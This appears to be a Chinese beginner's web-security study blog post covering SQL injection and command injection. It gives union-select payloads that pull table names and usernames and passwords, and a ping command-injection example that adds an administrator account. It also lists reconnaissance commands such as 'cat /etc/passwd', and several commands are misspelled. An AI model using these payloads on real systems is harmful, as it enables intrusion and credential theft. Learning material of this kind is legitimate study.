<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  
  <meta name="description" content="###简单的sql注入原理都和其他渗透方式差不多，都是未将用户提供的参数和查询代码隔离。常见几种注入方式：整形注入；字符型注入；基于错误显示的sql注入；union型sql注入；布尔型注入；基于时间的sql注入web后端数据库一般有Mysql，SQLServer，Oracle，Access，
###">
  

  
  
  
  
  
  
  <title>web安全入门第三天 | 随便的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="###简单的sql注入原理都和其他渗透方式差不多，都是未将用户提供的参数和查询代码隔离。常见几种注入方式：整形注入；字符型注入；基于错误显示的sql注入；union型sql注入；布尔型注入；基于时间的sql注入web后端数据库一般有Mysql，SQLServer，Oracle，Access， ######因为没有细致的展开去学，这里也不过多介绍，后面学了会补上博客连接 ####注入的基本思路：·判">
<meta property="og:type" content="article">
<meta property="og:title" content="web安全入门第三天">
<meta property="og:url" content="http://yoursite.com/2019/03/19/web安全入门第三天/index.html">
<meta property="og:site_name" content="随便的博客">
<meta property="og:description" content="###简单的sql注入原理都和其他渗透方式差不多，都是未将用户提供的参数和查询代码隔离。常见几种注入方式：整形注入；字符型注入；基于错误显示的sql注入；union型sql注入；布尔型注入；基于时间的sql注入web后端数据库一般有Mysql，SQLServer，Oracle，Access， ######因为没有细致的展开去学，这里也不过多介绍，后面学了会补上博客连接 ####注入的基本思路：·判">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://s2.ax1x.com/2019/03/19/AnWmEF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/03/19/AnhkwT.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/03/19/AnhATU.png">
<meta property="og:updated_time" content="2019-03-19T08:40:40.783Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="web安全入门第三天">
<meta name="twitter:description" content="###简单的sql注入原理都和其他渗透方式差不多，都是未将用户提供的参数和查询代码隔离。常见几种注入方式：整形注入；字符型注入；基于错误显示的sql注入；union型sql注入；布尔型注入；基于时间的sql注入web后端数据库一般有Mysql，SQLServer，Oracle，Access， ######因为没有细致的展开去学，这里也不过多介绍，后面学了会补上博客连接 ####注入的基本思路：·判">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/03/19/AnWmEF.png">
  
  
    <link rel="icon" href="/css/images/favicon.ico">
  
  <link rel="stylesheet" href="/css/style.css">
  

  
  <!-- baidu webmaster push -->
  <script src="//push.zhanzhang.baidu.com/push.js"></script>
</head></html>
<body class="home blog custom-background custom-font-enabled single-author">
  <div id="page" class="hfeed site">
      <header id="masthead" class="site-header" role="banner">
    <hgroup>
      <h1 class="site-title">
        <a href="/" title="随便的博客" rel="home">随便的博客</a>
      </h1>
      
        <h2 class="site-description">
          <a href="/" id="subtitle">真的很随便</a>
        </h2>
      
    </hgroup>

    <nav id="site-navigation" class="main-navigation" role="navigation">
            <button class="menu-toggle">菜单</button>
            <a class="assistive-text" href="/#content" title="跳至内容">跳至内容</a><!--TODO-->
            <div class="menu-main-container">
                <ul id="menu-main" class="nav-menu">
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/">Home</a></li>
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/archives">Archives</a></li>
                
                </ul>
            </div>
    </nav>
</header>

      <div id="main" class="wrapper">
        <div id="primary" class="site-content"><div id="content" role="main"><article id="post-web安全入门第三天" class="post-web安全入门第三天 post type-post status-publish format-standard hentry">
    <!---->

      <header class="entry-header">
        
        
  
    <h1 class="entry-title article-title">
      web安全入门第三天
    </h1>
  

        
        <div class="comments-link">
            
            <a href="javascript:void(0);" data-url="http://yoursite.com/2019/03/19/web安全入门第三天/" data-id="cjtfj3ewp0001rkuk02iixzmx" class="leave-reply bdsharebuttonbox" data-cmd="more">Share</a>
        </div><!-- .comments-link -->
      </header><!-- .entry-header -->

    <div class="entry-content">
      
        <p>###简单的sql注入<br>原理都和其他渗透方式差不多，都是未将用户提供的参数和查询代码隔离。<br>常见几种注入方式：<br>整形注入；字符型注入；基于错误显示的sql注入；union型sql注入；布尔型注入；基于时间的sql注入<br>web后端数据库一般有Mysql，SQLServer，Oracle，Access，</p>
<p>######因为没有细致的展开去学，这里也不过多介绍，后面学了会补上博客连接</p>
<p>####注入的基本思路：<br>·判断是否为动态网站，注入点仅存于动态网站；<br>·判断是否有注入点<br>·手工或者通过工具查看数据库信息<br>·获取敏感信息，密码等</p>
<hr>
<p>####常见手工注入语句：<br>‘ and ’1‘=’1        ；‘ and ’1‘=’2<br>查询列数的语句： order by n （超出列数会执行错误）<br>union(联合查询可以和多条select语句共同起作用)<br>判断数据显示点 union select 1，2，3，N<br>查看数据库基本信息<br>version（），database（）<br>查看数据库有哪些表<br>union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=’security’<br>查看对应表有那些列<br>union select 1,2,group_contacat(column_name)from information_schema.clumns where table_name= ‘users’<br>查看账号密码信息<br>union select 1,group_concat(username),group_concat(password) from users<br>最常用的工具就是SQL map了，上手也快功能强大<br><img src="https://s2.ax1x.com/2019/03/19/AnWmEF.png" alt><br><a href="https://www.baidu.com" target="_blank" rel="noopener">进阶版</a></p>
<hr>
<p>###命令注入漏洞<br>有些网站可以提ping功能，但是如果缺少一些过滤保护，那么就能通过一些特殊的指令让其执行恶意命令<br>命令的权限取决于web中间件的权限<br>举个简单的例子 ping 127.0.0.1 &amp;&amp; net user admin password /add<br>就可以通过命令添加一个新的admin管理员<br>常见下面的命令：</p>
<hr>
<table>
<thead>
<tr>
<th style="text-align:left">·for windows</th>
<th style="text-align:right"></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">ping</td>
<td style="text-align:right">测试网络连通性</td>
</tr>
<tr>
<td style="text-align:left">netstart</td>
<td style="text-align:right">查看网络端口及连接状态</td>
</tr>
<tr>
<td style="text-align:left">net user</td>
<td style="text-align:right">查看增加删除当前系统账号</td>
</tr>
<tr>
<td style="text-align:left">net localgroup</td>
<td style="text-align:right">查看增加删除当前系统账号</td>
</tr>
<tr>
<td style="text-align:left">net localgroup</td>
<td style="text-align:right">查看增加删除当前系统用户组</td>
</tr>
<tr>
<td style="text-align:left">dir</td>
<td style="text-align:right">当前目录下的文件和子目录信息</td>
</tr>
<tr>
<td style="text-align:left">req</td>
<td style="text-align:right">注册表及相关操作</td>
</tr>
<tr>
<td style="text-align:left">systeminfo</td>
<td style="text-align:right">查看当前计算机的综合信息</td>
</tr>
<tr>
<td style="text-align:left">tasklist</td>
<td style="text-align:right">显示当前运行的进程信息</td>
</tr>
</tbody>
</table>
<hr>
<p>|·多条语句执行语法格式    |                        |<br>| :——————– | ——————-：    |<br>|语句1 &amp; 语句2             |执行1后执行2             |<br>|语句1 &amp;&amp; 语句2             |执行1成功后执行2          |<br>|语句1  语句2            |执行1失败后执行2         |<br>|语句1  语句2             |把1的执行结果传递给2        |</p>
<table>
<thead>
<tr>
<th style="text-align:left">·for linux</th>
<th style="text-align:right"></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">ifconfig</td>
<td style="text-align:right">查看当前ip，mac等信息</td>
</tr>
<tr>
<td style="text-align:left">netstat</td>
<td style="text-align:right">查看网络开放端口及连接状态</td>
</tr>
<tr>
<td style="text-align:left">whoiam</td>
<td style="text-align:right">查看当前用户</td>
</tr>
<tr>
<td style="text-align:left">cat /etc/passwd</td>
<td style="text-align:right">查看所有用户信息</td>
</tr>
<tr>
<td style="text-align:left">ls</td>
<td style="text-align:right">查看当前目录下的文件和子目录信息</td>
</tr>
<tr>
<td style="text-align:left">useradd</td>
<td style="text-align:right">添加账户</td>
</tr>
<tr>
<td style="text-align:left">userdel</td>
<td style="text-align:right">删除账户</td>
</tr>
<tr>
<td style="text-align:left">passwd</td>
<td style="text-align:right">修改账户密码</td>
</tr>
</tbody>
</table>
<p>命令注入一般流程<br><img src="https://s2.ax1x.com/2019/03/19/AnhkwT.png" alt><br><img src="https://s2.ax1x.com/2019/03/19/AnhATU.png" alt> </p>

      
    </div><!-- .entry-content -->

    <footer class="entry-meta">
    <a href="/2019/03/19/web安全入门第三天/">
    <time datetime="2019-03-19T01:56:53.000Z" class="entry-date">
        2019-03-19
    </time>
</a>
    
    
    </footer>
</article>


    
<nav class="nav-single">
    <h3 class="assistive-text">文章导航</h3>
    
    
        <span class="nav-next"><a href="/2019/03/18/web安全入门第二天/" rel="next">web安全入门第二天 <span class="meta-nav">→</span></a></span>
    
</nav><!-- .nav-single -->







</div></div>
        <div id="secondary" class="widget-area" role="complementary">
  
    <aside id="search" class="widget widget_search"><form role="search" method="get" accept-charset="utf-8" id="searchform" class="searchform" action="//google.com/search">
    <div>
        <input type="text" value name="s" id="s">
        <input type="submit" id="searchsubmit" value="搜索">
    </div>
</form></aside>
  
    
  
    
  
    
  <aside class="widget">
    <h3 class="widget-title">Recents</h3>
    <div class="widget-content">
      <ul>
        
          <li>
            <a href="/2019/03/19/web安全入门第三天/">web安全入门第三天</a>
          </li>
        
          <li>
            <a href="/2019/03/18/web安全入门第二天/">web安全入门第二天</a>
          </li>
        
          <li>
            <a href="/2019/03/18/web安全入门第一天/">web安全入门第一天</a>
          </li>
        
          <li>
            <a href="/2019/03/17/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </aside>

  
    
  
    
  
</div>
      </div>
      <footer id="colophon" role="contentinfo">
    <p>&copy; 2019 或者说是笔记本嘛
    All rights reserved.</p>
    <p>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></p>
</footer>
    <script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"1","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"16"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/js/share.js'];</script>

<script src="/js/jquery-3.3.1.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>

<script src="/js/navigation.js"></script>

<div id="bg"></div>

  </div>
</body>
</html>